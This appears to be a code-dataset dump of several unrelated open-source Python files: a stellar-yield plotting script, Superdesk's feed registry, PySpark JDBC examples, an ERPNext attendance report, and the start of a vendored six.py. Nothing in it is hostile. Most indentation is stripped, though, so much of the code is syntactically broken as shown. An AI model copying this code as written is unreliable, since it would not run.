# plt.ylim(-2, 2)
# i = len(M_list) - 1
# while i > -1:
# plt.plot(M_list[i], Mg_over_H_list[i], label='Z={}'.format(Z_list[i]))
# (i) = (i - 1)
# plt.plot([-2, 3], [0, 0], lw=0.1)
# plt.legend(prop={'size': 6}, loc='best')
# plt.xlabel(r'log$_{10}$($M_{\rm *, initial}$/[$M_\odot$])')
# plt.ylabel(r'[Mg/H]')
# plt.tight_layout()
# #
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(42, figsize=(4, 3.5))
# plt.xlim(-0.5, 2.2)
# plt.ylim(-2, 2)
# i = len(M_list) - 1
# while i > -1:
# plt.plot(M_list[i], Si_over_H_list[i], label='Z={}'.format(Z_list[i]))
# (i) = (i - 1)
# plt.plot([-2, 3], [0, 0], lw=0.1)
# plt.legend(prop={'size': 6}, loc='best')
# plt.xlabel(r'log$_{10}$($M_{\rm *, initial}$/[$M_\odot$])')
# plt.ylabel(r'[Si/H]')
# plt.tight_layout()
# #
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(41, figsize=(4, 3.5))
# plt.xlim(-0.5, 2.2)
# # plt.ylim(-2, 2)
# i = len(M_list) - 1
# while i > -1:
# plt.plot(M_list[i], C_over_H_list[i], label='Z={}'.format(Z_list[i]))
# (i) = (i - 1)
# plt.plot([-2, 3], [0, 0], lw=0.1)
# plt.legend(prop={'size': 6}, loc='best')
# plt.xlabel(r'log$_{10}$($M_{\rm *, initial}$/[$M_\odot$])')
# plt.ylabel(r'[C/H]')
# plt.tight_layout()
# plt.savefig('steller_yield_Mg.pdf', dpi=250)
#
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(5, figsize=(4, 3.5))
# plt.xlim(-0.5, 2.2)
# plt.ylim(-2, 2)
# i = len(M_list) - 1
# while i > -1:
# plt.plot(M_list[i], O_over_H_list[i], label='Z={}'.format(Z_list[i]))
# (i) = (i - 1)
# plt.plot([-2, 3], [0, 0], lw=0.1)
# plt.legend(prop={'size': 6}, loc='best')
# plt.xlabel(r'log$_{10}$($M_{\rm *, initial}$/[$M_\odot$])')
# plt.ylabel(r'[O/H]')
# plt.tight_layout()
# # plt.savefig('steller_yield_O.pdf', dpi=250)
#
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(6, figsize=(4, 3.5))
# plt.xlim(-0.5, 2.2)
# plt.ylim(-2, 2)
# i = len(M_list)-1
# while i > -1:
# plt.plot(M_list[i], Fe_over_H_list[i], label='Z={}'.format(Z_list[i]))
# (i) = (i - 1)
# plt.plot([-2, 3], [0, 0], lw=0.1)
# plt.legend(prop={'size': 6}, loc='best')
# plt.xlabel(r'log$_{10}$($M_{\rm *, initial}$/[$M_\odot$])')
# plt.ylabel(r'[Fe/H]')
# plt.tight_layout()
# # plt.savefig('steller_yield_Fe.pdf', dpi=250)
#
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(7, figsize=(4, 3.5))
# plt.xlim(-0.5, 2.2)
# plt.ylim(-2, 2)
# i = len(M_list) - 1
# while i > -1:
# plt.plot(M_list[i], Z_over_H_list[i], label='Z={}'.format(Z_list[i]))
# (i) = (i - 1)
# plt.plot([-2, 3], [0, 0], lw=0.1)
# plt.legend(prop={'size': 6}, loc='best')
# plt.xlabel(r'log$_{10}$($M_{\rm *, initial}$/[$M_\odot$])')
# plt.ylabel(r'[Z/H]')
# plt.title("Number ratio")
# plt.tight_layout()
#
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(8, figsize=(4, 3.5))
# plt.xlim(-0.5, 2.2)
# plt.ylim(-2, 2)
# i = len(M_list) - 1
# while i > -1:
# plt.plot(M_list[i], Z_over_X_list[i], label='Z={}'.format(Z_list[i]))
# (i) = (i - 1)
# plt.plot([-2, 3], [0, 0], lw=0.1)
# plt.legend(prop={'size': 6}, loc='best')
# plt.xlabel(r'log$_{10}$($M_{\rm *, initial}$/[$M_\odot$])')
# plt.ylabel(r'[Z/X]')
# plt.title("Mass ratio")
# plt.tight_layout()
#
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(11, figsize=(4, 3.5))
# plt.xlim(-0.5, 2.2)
# plt.ylim(0.23, 0.6)
# i = len(M_list) - 1
# while i > -1:
# plt.plot(M_list[i], YYY_list[i], label='Z={}'.format(Z_list[i]))
# (i) = (i - 1)
# # plt.plot([-2, 3], [0.25, 0.25], lw=0.5)
# plt.legend(prop={'size': 6}, loc='best')
# plt.xlabel(r'log$_{10}$($M_{\rm *, initial}$/[$M_\odot$])')
# plt.ylabel('Y')
# plt.tight_layout()
# # plt.savefig('steller_yield_Y.pdf', dpi=250)
##########
fig, axs = plt.subplots(3, 1, sharex=True, figsize=(3, 4))
# i = len(M_list) - 1
# while i > -1:
# axs[0].plot(M_list[i], Z_over_Z0_list[i], lw=(i+2)/2, color=colors[color_list_[i]])
# (i) = (i - 1)
# axs[0].plot([-2, 3], [0, 0], lw=0.7, ls='dotted')
# # axs[0].set_yticks(np.arange(-1, 2.1, 1))
# axs[0].set_ylim(-2, 1.6)
# axs[0].set_ylabel(r'[Z]')
#
# i = len(M_list) - 1
# while i > -1:
# # axs[1].plot(M_list[i], XXX_list[i], lw=(i+2)/2, color=colors[color_list_[i]])
# axs[1].plot(M_list[i], YYY_list[i], lw=(i+2)/2, color=colors[color_list_[i]])
# # axs[1].plot(M_list[i], ZZZ_list[i], lw=(i+2)/2, color=colors[color_list_[i]])
# (i) = (i - 1)
# axs[1].plot([-2, 3], [0.273, 0.273], lw=0.7, ls='dotted')
# # axs[1].set_yticks(np.arange(0.2, 0.61, 0.1))
# axs[1].set_ylim(0.24, 0.605)
# axs[1].set_xlim(-0.5, 2.2)
# axs[1].set_ylabel('Y')
# axs[0].plot([1.3073, 1.3073], [-0.1, 1.7], lw=0.2)
axs[0].axvspan(1.3073, 3, alpha=0.2, color='red')
i = len(M_list) - 1
while i > -1:
ZZZ = Z_list[i]
if ZZZ > 0:
Z_box = round(math.log(ZZZ, 10) - math.log(0.01886, 10), 2)
else:
Z_box = -6
M_list[i].insert(0, math.log(150, 10))
Mg_over_Fe_list[i].insert(0, Mg_over_Fe_list[i][0])
axs[0].plot(M_list[i], Mg_over_Fe_list[i], lw=2**i*0.7, label=r'$Z={}$'.format(ZZZ), color='k', ls=['-', 'dashed', 'dotted'][i])
(i) = (i - 1)
# axs[0].plot([-0.3, 0.9], [Mg_over_Fe_SNIa, Mg_over_Fe_SNIa], ls="--", lw=1, label="SNIa", c='k')
# axs[0].plot([-2, 3], [0, 0], lw=0.7, ls='dotted')
# axs[0].set_yticks(np.arange(-2, 2.1, 2))
axs[0].set_xlim(0.7, 1.7)
axs[0].set_ylim(-0.1, 1.7)
axs[0].set_ylabel(r'[Mg/Fe]')
axs[0].set_xlabel(r'log$_{10}(M_{\rm *, initial}$ [$M_\odot$])')
axs[0].legend(prop={'size': 6}, loc='best')
axs[1].axvspan(1.3073, 3, alpha=0.2, color='red')
i = len(M_list) - 1
while i > -1:
Si_over_Fe_list[i].insert(0, Si_over_Fe_list[i][0])
        axs[1].plot(M_list[i], Si_over_Fe_list[i], lw=2**i*0.7, label=r'$Z={}$'.format(Z_list[i]),
                    color='k', ls=['-', 'dashed', 'dotted'][i])
(i) = (i - 1)
# axs[1].plot([-0.3, 0.9], [Si_over_Fe_SNIa, Si_over_Fe_SNIa], ls="--", lw=1, label="SNIa", c='k')
# axs[1].plot([-2, 3], [0, 0], lw=0.7, ls='dotted')
# axs[1].set_yticks(np.arange(-2, 2.1, 2))
axs[1].set_ylim(-0.1, 1.7)
axs[1].set_ylabel(r'[Si/Fe]')
axs[1].set_xlabel(r'log$_{10}(M_{\rm *, initial}$ [$M_\odot$])')
# axs[1].legend(prop={'size': 6}, loc='best')
axs[2].axvspan(1.3073, 3, alpha=0.2, color='red')
i = len(M_list) - 1
while i > -1:
Ca_over_Fe_list[i].insert(0, Ca_over_Fe_list[i][0])
        axs[2].plot(M_list[i], Ca_over_Fe_list[i], lw=2**i*0.7, label=r'$Z={}$'.format(Z_list[i]),
                    color='k', ls=['-', 'dashed', 'dotted'][i])
(i) = (i - 1)
# axs[2].plot([-0.3, 0.9], [Ca_over_Fe_SNIa, Ca_over_Fe_SNIa], ls="--", lw=1, label="SNIa", c='k')
# axs[2].plot([-2, 3], [0, 0], lw=0.7, ls='dotted')
# axs[2].set_yticks(np.arange(-2, 2.1, 2))
axs[2].set_ylim(-0.1, 1.7)
axs[2].set_ylabel(r'[Ca/Fe]')
axs[2].set_xlabel(r'log$_{10}(M_{\rm *, initial}$ [$M_\odot$])')
# axs[2].legend(prop={'size': 6}, loc='best')
plt.tight_layout()
# Remove horizontal space between axes
fig.subplots_adjust(hspace=0)
plt.savefig('stellar_yields.pdf', dpi=250)
plt.show()
return
if __name__ == '__main__':
start_time = time.time()
Z_list = []
M_list = []
eject_mass_list = []
H_eject_mass_list = []
He_eject_mass_list = []
C_eject_mass_list = []
N_eject_mass_list = []
O_eject_mass_list = []
Ne_eject_mass_list = []
Mg_eject_mass_list = []
Si_eject_mass_list = []
S_eject_mass_list = []
Ca_eject_mass_list = []
Fe_eject_mass_list = []
Metal_eject_mass_list = []
O_over_Mg_list = []
Mg_over_H_list = []
Si_over_H_list = []
C_over_H_list = []
Fe_over_H_list = []
O_over_H_list = []
Z_over_H_list = []
Z_over_X_list = []
Z_over_Z0_list = []
XXX_list = []
YYY_list = []
ZZZ_list = []
Mg_over_Fe_list = []
Si_over_Fe_list = []
Ca_over_Fe_list = []
O_over_Fe_list = []
yield_table_name = "Kobayashi06" # being "WW95" or "portinari98" or "marigo01"
function_read_file(yield_table_name)
    function_plot_yields()
plot_lifetime_and_finalmass()
print(" - Run time: %s -" % round((time.time() - start_time), 2)) | gpl-3.0 |
superdesk/superdesk-core | superdesk/io/registry.py | 2 | 6016 | # -*- coding: utf-8; -*-
#
# This file is part of Superdesk.
#
# Copyright 2013, 2014 Sourcefabric z.u. and contributors.
#
# For the full copyright and license information, please see the
# AUTHORS and LICENSE files distributed with this source code, or
# at https://www.sourcefabric.org/superdesk/license
"""Superdesk IO Registry"""
from superdesk import Resource, Service
from superdesk.utils import ListCursor
from superdesk.errors import SuperdeskIngestError, AlreadyExistsError
registered_feed_parsers = {}
allowed_feed_parsers = []
registered_feeding_services = {}
allowed_feeding_services = []
feeding_service_errors = {}
publish_errors = []
restricted_feeding_service_parsers = {}
def register_feeding_service(service_class):
"""
Registers the Feeding Service with the application.
:class: `superdesk.io.feeding_services.RegisterFeedingService` uses this function to register the feeding service.
:param service_class: Feeding Service class
:raises: AlreadyExistsError if a feeding service with same name already been registered
"""
if service_class.NAME in registered_feeding_services:
raise AlreadyExistsError(
"Feeding Service: {} already registered by {}".format(
service_class.NAME, registered_feeding_services[service_class.NAME]
)
)
registered_feeding_services[service_class.NAME] = service_class
allowed_feeding_services.append(service_class.NAME)
service_class.ERRORS.append(SuperdeskIngestError.parserNotFoundError().get_error_description())
feeding_service_errors[service_class.NAME] = dict(service_class.ERRORS)
def register_feeding_service_error(service_name, error):
"""
Registers an error with the service named
:param service_name: unique name to identify the Feeding Service class
:param error: tuple representing the error, the tuple contains the error_code and the error message
:return:
"""
    feeding_service_errors.setdefault(service_name, {}).update(dict([error]))
def get_feeding_service(service_name):
"""
Create and return Feeding Service instance.
:param service_name: unique name to identify the Feeding Service class.
:return: Feeding Service instance.
:raise KeyError: there is no feeding service registered with this `service_name`.
"""
return registered_feeding_services[service_name]()
def register_feed_parser(parser_name, parser_class):
"""
Registers the Feed Parser with the application.
:class: `superdesk.io.feed_parsers.RegisterFeedParser` uses this function to register the feed parser.
:param parser_name: unique name to identify the Feed Parser class
:param parser_class: Feed Parser class
    :raises: AlreadyExistsError if a feed parser with the same name has already been registered
"""
if parser_name in registered_feed_parsers:
raise AlreadyExistsError(
"Feed Parser: {} already registered by {}".format(parser_name, type(registered_feed_parsers[parser_name]))
)
registered_feed_parsers[parser_name] = parser_class
allowed_feed_parsers.append(parser_name)
def register_feeding_service_parser(service_name, parser_name):
"""
Registers the Feed Parser with the Feeding service.
:param service_name: unique name to identify the Feeding Service class
    :param parser_name: unique name to identify the Feed Parser class, or
        None if the feeding service doesn't expect any parser
"""
if not restricted_feeding_service_parsers.get(service_name):
restricted_feeding_service_parsers[service_name] = {}
if parser_name is None:
if restricted_feeding_service_parsers[service_name]:
raise ValueError("You can't set None to a feeding service if some parsers are already registered")
restricted_feeding_service_parsers[service_name] = None
else:
restricted_feeding_service_parsers[service_name][parser_name] = True
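# Illustrative sketch (hypothetical service/parser names): restrict a feeding
# service to specific parsers, or declare it parserless with None. Mixing the
# two for the same service raises ValueError.
#
#   register_feeding_service_parser('dummy_service', 'ninjs')
#   register_feeding_service_parser('dummy_service', 'newsml12')
#   register_feeding_service_parser('parserless_service', None)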
def get_feed_parser(parser_name):
"""
Retrieve registered feed parser class from its name
:param parser_name: name of the parser, as in register_feed_parser
:type parser_name: str
:return str: feed parser class
:raise KeyError: there is no parser registered with this name
"""
return registered_feed_parsers[parser_name]
class FeedParserAllowedResource(Resource):
resource_methods = ["GET"]
item_methods = []
allow_unknown = True
class FeedParserAllowedService(Service):
def get(self, req, lookup):
def parser(parser_id):
registered = registered_feed_parsers[parser_id]
return {"feed_parser": parser_id, "label": getattr(registered, "label", parser_id)}
return ListCursor([parser(_id) for _id in registered_feed_parsers])
class FeedingServiceAllowedResource(Resource):
resource_methods = ["GET"]
item_methods = []
schema = {
"feeding_service": {"type": "string"},
"label": {"type": "string"},
"fields": {"type": "list"},
"field_groups": {"type": "dict", "schema": {}},
"parser_restricted_values": {"type": "list"},
}
class FeedingServiceAllowedService(Service):
def get(self, req, lookup):
def service(service_id):
feeding_service_class = registered_feeding_services[service_id]
restricted_parsers = restricted_feeding_service_parsers.get(service_id, {})
if restricted_parsers is not None:
restricted_parsers = list(restricted_parsers.keys())
fields = getattr(feeding_service_class, "fields", [])
return {
"feeding_service": service_id,
"label": getattr(feeding_service_class, "label", service_id),
"fields": fields,
"field_groups": getattr(feeding_service_class, "field_groups", {}),
"parser_restricted_values": restricted_parsers,
}
return ListCursor([service(_id) for _id in registered_feeding_services])
| agpl-3.0 |
sangwook236/SWDT | sw_dev/python/ext/test/high_performance_computing/spark/pyspark_database.py | 2 | 5564 | #!/usr/bin/env python
from pyspark.sql import SparkSession
import pyspark.sql.types as types
import pyspark.sql.functions as func
import traceback, sys
# REF [site] >> https://spark.apache.org/docs/latest/sql-programming-guide.html#jdbc-to-other-databases
def sqlite_jdbc():
spark = SparkSession.builder.appName('sqlite-jdbc') \
.config('spark.jars.packages', 'org.xerial:sqlite-jdbc:3.23.1') \
.getOrCreate()
#spark = SparkSession.builder.appName('sqlite-jdbc') \
# .config('spark.jars', 'sqlite-jdbc-3.23.1.jar') \
# .getOrCreate()
spark.sparkContext.setLogLevel('WARN')
# REF [site] >> https://spark.apache.org/docs/latest/sql-programming-guide.html#pyspark-usage-guide-for-pandas-with-apache-arrow
# Enable Arrow-based columnar data transfers.
spark.conf.set('spark.sql.execution.arrow.enabled', 'true')
if False:
#db_url = 'jdbc:sqlite:/path/to/dbfile' # File DB.
df = spark.read \
.format('jdbc') \
.option('url', 'jdbc:sqlite:iris.db') \
.option('driver', 'org.sqlite.JDBC') \
.option('dbtable', 'iris') \
.load()
elif False:
# REF [site] >> https://www.sqlite.org/inmemorydb.html
#db_url = 'jdbc:sqlite::memory:' # In-memory DB.
db_url = 'jdbc:sqlite::memory:?cache=shared' # Shared in-memory DB.
#db_url = 'jdbc:sqlite:dbname?mode=memory&cache=shared' # Named, shared in-memory DB.
# NOTE [error] >> Requirement failed: Option 'dbtable' is required.
# NOTE [error] >> SQL error or missing database (no such table: test123).
df = spark.read \
.format('jdbc') \
.option('url', db_url) \
.option('driver', 'org.sqlite.JDBC') \
.option('dbtable', 'test123') \
.load()
else:
rdd = spark.sparkContext.parallelize([
(123, 'Katie', 19, 'brown'),
(234, 'Michael', 22, 'green'),
(345, 'Simone', 23, 'blue')
])
# Specify schema.
schema = types.StructType([
types.StructField('id', types.LongType(), True),
types.StructField('name', types.StringType(), True),
types.StructField('age', types.LongType(), True),
types.StructField('eyeColor', types.StringType(), True)
])
df = spark.createDataFrame(rdd, schema)
df.show()
	# NOTE [info] >> It seems that only SQLite file DBs can be used in Spark.
db_url = 'jdbc:sqlite:test.sqlite' # File DB.
# Isolation level: NONE, READ_COMMITTED, READ_UNCOMMITTED, REPEATABLE_READ, SERIALIZABLE.
# REF [site] >> https://stackoverflow.com/questions/16162357/transaction-isolation-levels-relation-with-locks-on-table
df.write \
.format('jdbc') \
.mode('overwrite') \
.option('url', db_url) \
.option('driver', 'org.sqlite.JDBC') \
.option('dbtable', 'swimmers') \
.option('isolationLevel', 'NONE') \
.save()
#df.write.jdbc(url=db_url, table='test', mode='overwrite', properties={'driver': 'org.sqlite.JDBC'})
df1 = df.withColumn('gender', func.lit(0))
df2 = spark.createDataFrame(
[(13, 'Lucy', 12, 'brown'), (37, 'Brian', 47, 'black')],
('id', 'name', 'age', 'eyeColor')
)
df2.write \
.format('jdbc') \
.mode('append') \
.option('url', db_url) \
.option('driver', 'org.sqlite.JDBC') \
.option('dbtable', 'swimmers') \
.option('isolationLevel', 'NONE') \
.save()
def mysql_jdbc():
spark = SparkSession.builder.appName('mysql-jdbc') \
.config('spark.jars.packages', 'mysql:mysql-connector-java:8.0.12') \
.getOrCreate()
#spark = SparkSession.builder.appName('mysql-jdbc') \
# .config('spark.jars', 'mysql-connector-java-8.0.12-bin.jar') \
# .getOrCreate()
spark.sparkContext.setLogLevel('WARN')
# REF [site] >> https://spark.apache.org/docs/latest/sql-programming-guide.html#pyspark-usage-guide-for-pandas-with-apache-arrow
# Enable Arrow-based columnar data transfers.
spark.conf.set('spark.sql.execution.arrow.enabled', 'true')
df = spark.read \
.format('jdbc') \
.option('url', 'jdbc:mysql://host:3306/dbname?characterEncoding=UTF-8&serverTimezone=UTC') \
.option('driver', 'com.mysql.cj.jdbc.Driver') \
.option('dbtable', 'tablename') \
.option('user', 'username') \
.option('password', 'password') \
.load()
df.show()
def sql_basic():
spark = SparkSession.builder.appName('dataframe-operation').getOrCreate()
spark.sparkContext.setLogLevel('WARN')
df = spark.createDataFrame(
[(123, 'Katie', 19, 'brown'), (234, 'Michael', 22, 'green'), (345, 'Simone', 23, 'blue')],
('id', 'name', 'age', 'eyeColor')
)
#df.printSchema()
#df.cache()
df.createOrReplaceTempView('swimmers') # DataFrame -> SQL.
#df1 = spark.sql('select * from swimmers') # SQL -> DataFrame.
spark.sql('select * from swimmers where age >= 20').show()
#spark.catalog.dropTempView('swimmers')
def main():
#sqlite_jdbc()
#mysql_jdbc()
sql_basic()
#%%------------------------------------------------------------------
# Usage:
# python pyspark_database.py
# spark-submit --packages mysql:mysql-connector-java:8.0.12,org.xerial:sqlite-jdbc:3.23.1 pyspark_database.py
# spark-submit --master local[4] --packages mysql:mysql-connector-java:8.0.12,org.xerial:sqlite-jdbc:3.23.1 pyspark_database.py
# spark-submit --master spark://host:7077 --packages mysql:mysql-connector-java:8.0.12,org.xerial:sqlite-jdbc:3.23.1 --executor-memory 10g pyspark_database.py
if '__main__' == __name__:
try:
main()
except:
#ex = sys.exc_info() # (type, exception object, traceback).
##print('{} raised: {}.'.format(ex[0], ex[1]))
#print('{} raised: {}.'.format(ex[0].__name__, ex[1]))
#traceback.print_tb(ex[2], limit=None, file=sys.stdout)
#traceback.print_exception(*sys.exc_info(), limit=None, file=sys.stdout)
traceback.print_exc(limit=None, file=sys.stdout)
| gpl-3.0 |
lasalesi/erpnext | erpnext/schools/report/student_monthly_attendance_sheet/student_monthly_attendance_sheet.py | 4 | 3812 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import cstr, cint, getdate, get_first_day, get_last_day, date_diff, add_days
from frappe import msgprint, _
from calendar import monthrange
from erpnext.schools.api import get_student_batch_students
def execute(filters=None):
if not filters: filters = {}
from_date = get_first_day(filters["month"] + '-' + filters["year"])
to_date = get_last_day(filters["month"] + '-' + filters["year"])
	total_days_in_month = date_diff(to_date, from_date) + 1
columns = get_columns(total_days_in_month)
students = get_student_batch_students(filters.get("student_batch"))
students_list = get_students_list(students)
att_map = get_attendance_list(from_date, to_date, filters.get("student_batch"), students_list)
data = []
for stud in students:
row = [stud.student, stud.student_name]
date = from_date
total_p = total_a = 0.0
for day in range(total_days_in_month):
status="None"
if att_map.get(stud.student):
status = att_map.get(stud.student).get(date, "None")
status_map = {"Present": "P", "Absent": "A", "None": ""}
row.append(status_map[status])
if status == "Present":
total_p += 1
elif status == "Absent":
total_a += 1
date = add_days(date, 1)
row += [total_p, total_a]
data.append(row)
return columns, data
def get_columns(days_in_month):
columns = [ _("Student") + ":Link/Student:90", _("Student Name") + "::150"]
for day in range(days_in_month):
columns.append(cstr(day+1) +"::20")
columns += [_("Total Present") + ":Int:95", _("Total Absent") + ":Int:90"]
return columns
def get_students_list(students):
student_list = []
for stud in students:
student_list.append(stud.student)
return student_list
def get_attendance_list(from_date, to_date, student_batch, students_list):
attendance_list = frappe.db.sql("""select student, date, status
from `tabStudent Attendance` where student_batch = %s
and date between %s and %s
order by student, date""",
(student_batch, from_date, to_date), as_dict=1)
att_map = {}
students_with_leave_application = get_students_with_leave_application(from_date, to_date, students_list)
for d in attendance_list:
att_map.setdefault(d.student, frappe._dict()).setdefault(d.date, "")
		if students_with_leave_application and d.student in students_with_leave_application.get(d.date, []):
att_map[d.student][d.date] = "Present"
else:
att_map[d.student][d.date] = d.status
return att_map
def get_students_with_leave_application(from_date, to_date, students_list):
leave_applications = frappe.db.sql("""
select student, from_date, to_date
from `tabStudent Leave Application`
where
mark_as_present and docstatus = 1
and student in %(students)s
and (
from_date between %(from_date)s and %(to_date)s
or to_date between %(from_date)s and %(to_date)s
or (%(from_date)s between from_date and to_date and %(to_date)s between from_date and to_date)
)
""", {
"students": students_list,
"from_date": from_date,
"to_date": to_date
}, as_dict=True)
	students_with_leaves = {}
for application in leave_applications:
for date in daterange(application.from_date, application.to_date):
students_with_leaves.setdefault(date, []).append(application.student)
return students_with_leaves
def daterange(d1, d2):
import datetime
return (d1 + datetime.timedelta(days=i) for i in range((d2 - d1).days + 1))
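# Illustrative note: daterange() is inclusive of both endpoints, e.g.
#   from datetime import date
#   list(daterange(date(2017, 1, 1), date(2017, 1, 3)))
#   # -> [date(2017, 1, 1), date(2017, 1, 2), date(2017, 1, 3)]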
@frappe.whitelist()
def get_attendance_years():
year_list = frappe.db.sql_list("""select distinct YEAR(date) from `tabStudent Attendance` ORDER BY YEAR(date) DESC""")
if not year_list:
year_list = [getdate().year]
return "\n".join(str(year) for year in year_list)
| gpl-3.0 |
Huskerboy/startbootstrap-freelancer | freelancer_env/Lib/site-packages/pip/_vendor/requests/packages/urllib3/packages/six.py | 2715 | 30098 | """Utilities for writing code that runs on Python 2 and 3"""
# Copyright (c) 2010-2015 Benjamin Peterson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import
import functools
import itertools
import operator
import sys
import types
__author__ = "Benjamin Peterson <benjamin@python.org>"
__version__ = "1.10.0"
# Useful for very coarse version differentiation.
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
PY34 = sys.version_info[0:2] >= (3, 4)
if PY3:
string_types = str,
integer_types = int,
class_types = type,
text_type = str
binary_type = bytes
MAXSIZE = sys.maxsize
else:
string_types = basestring,
integer_types = (int, long)
class_types = (type, types.ClassType)
text_type = unicode
binary_type = str
if sys.platform.startswith("java"):
# Jython always uses 32 bits.
MAXSIZE = int((1 << 31) - 1)
else:
# It's possible to have sizeof(long) != sizeof(Py_ssize_t).
class X(object):
def __len__(self):
return 1 << 31
try:
len(X())
except OverflowError:
# 32-bit
MAXSIZE = int((1 << 31) - 1)
else:
# 64-bit
MAXSIZE = int((1 << 63) - 1)
del X
def _add_doc(func, doc):
"""Add documentation to a function."""
func.__doc__ = doc
def _import_module(name):
"""Import module, returning the module after the last dot."""
__import__(name)
return sys.modules[name]
class _LazyDescr(object):
def __init__(self, name):
self.name = name
def __get__(self, obj, tp):
result = self._resolve()
setattr(obj, self.name, result) # Invokes __set__.
try:
# This is a bit ugly, but it avoids running this again by
# removing this descriptor.
delattr(obj.__class__, self.name)
except AttributeError:
pass
return result
class MovedModule(_LazyDescr):
def __init__(self, name, old, new=None):
super(MovedModule, self).__init__(name)
if PY3:
if new is None:
new = name
self.mod = new
else:
self.mod = old
def _resolve(self):
return _import_module(self.mod)
def __getattr__(self, attr):
_module = self._resolve()
value = getattr(_module, attr)
setattr(self, attr, value)
return value
class _LazyModule(types.ModuleType):
def __init__(self, name):
super(_LazyModule, self).__init__(name)
self.__doc__ = self.__class__.__doc__
def __dir__(self):
attrs = ["__doc__", "__name__"]
attrs += [attr.name for attr in self._moved_attributes]
return attrs
# Subclasses should override this
_moved_attributes = []
class MovedAttribute(_LazyDescr):
def __init__(self, name, old_mod, new_mod, old_attr=None, new_attr=None):
super(MovedAttribute, self).__init__(name)
if PY3:
if new_mod is None:
new_mod = name
self.mod = new_mod
if new_attr is None:
if old_attr is None:
new_attr = name
else:
new_attr = old_attr
self.attr = new_attr
else:
self.mod = old_mod
if old_attr is None:
old_attr = name
self.attr = old_attr
def _resolve(self):
module = _import_module(self.mod)
return getattr(module, self.attr)
class _SixMetaPathImporter(object):
"""
A meta path importer to import six.moves and its submodules.
This class implements a PEP302 finder and loader. It should be compatible
with Python 2.5 and all existing versions of Python3
"""
def __init__(self, six_module_name):
self.name = six_module_name
self.known_modules = {}
def _add_module(self, mod, *fullnames):
for fullname in fullnames:
self.known_modules[self.name + "." + fullname] = mod
def _get_module(self, fullname):
return self.known_modules[self.name + "." + fullname]
def find_module(self, fullname, path=None):
if fullname in self.known_modules:
return self
return None
def __get_module(self, fullname):
try:
return self.known_modules[fullname]
except KeyError:
raise ImportError("This loader does not know module " + fullname)
def load_module(self, fullname):
try:
# in case of a reload
return sys.modules[fullname]
except KeyError:
pass
mod = self.__get_module(fullname)
if isinstance(mod, MovedModule):
mod = mod._resolve()
else:
mod.__loader__ = self
sys.modules[fullname] = mod
return mod
def is_package(self, fullname):
"""
Return true, if the named module is a package.
We need this method to get correct spec objects with
Python 3.4 (see PEP451)
"""
return hasattr(self.__get_module(fullname), "__path__")
def get_code(self, fullname):
"""Return None
Required, if is_package is implemented"""
self.__get_module(fullname) # eventually raises ImportError
return None
get_source = get_code # same as get_code
_importer = _SixMetaPathImporter(__name__)
class _MovedItems(_LazyModule):
"""Lazy loading of moved objects"""
__path__ = [] # mark as package
_moved_attributes = [
MovedAttribute("cStringIO", "cStringIO", "io", "StringIO"),
MovedAttribute("filter", "itertools", "builtins", "ifilter", "filter"),
MovedAttribute("filterfalse", "itertools", "itertools", "ifilterfalse", "filterfalse"),
MovedAttribute("input", "__builtin__", "builtins", "raw_input", "input"),
MovedAttribute("intern", "__builtin__", "sys"),
MovedAttribute("map", "itertools", "builtins", "imap", "map"),
MovedAttribute("getcwd", "os", "os", "getcwdu", "getcwd"),
MovedAttribute("getcwdb", "os", "os", "getcwd", "getcwdb"),
MovedAttribute("range", "__builtin__", "builtins", "xrange", "range"),
MovedAttribute("reload_module", "__builtin__", "importlib" if PY34 else "imp", "reload"),
MovedAttribute("reduce", "__builtin__", "functools"),
MovedAttribute("shlex_quote", "pipes", "shlex", "quote"),
MovedAttribute("StringIO", "StringIO", "io"),
MovedAttribute("UserDict", "UserDict", "collections"),
MovedAttribute("UserList", "UserList", "collections"),
MovedAttribute("UserString", "UserString", "collections"),
MovedAttribute("xrange", "__builtin__", "builtins", "xrange", "range"),
MovedAttribute("zip", "itertools", "builtins", "izip", "zip"),
MovedAttribute("zip_longest", "itertools", "itertools", "izip_longest", "zip_longest"),
MovedModule("builtins", "__builtin__"),
MovedModule("configparser", "ConfigParser"),
MovedModule("copyreg", "copy_reg"),
MovedModule("dbm_gnu", "gdbm", "dbm.gnu"),
MovedModule("_dummy_thread", "dummy_thread", "_dummy_thread"),
MovedModule("http_cookiejar", "cookielib", "http.cookiejar"),
MovedModule("http_cookies", "Cookie", "http.cookies"),
MovedModule("html_entities", "htmlentitydefs", "html.entities"),
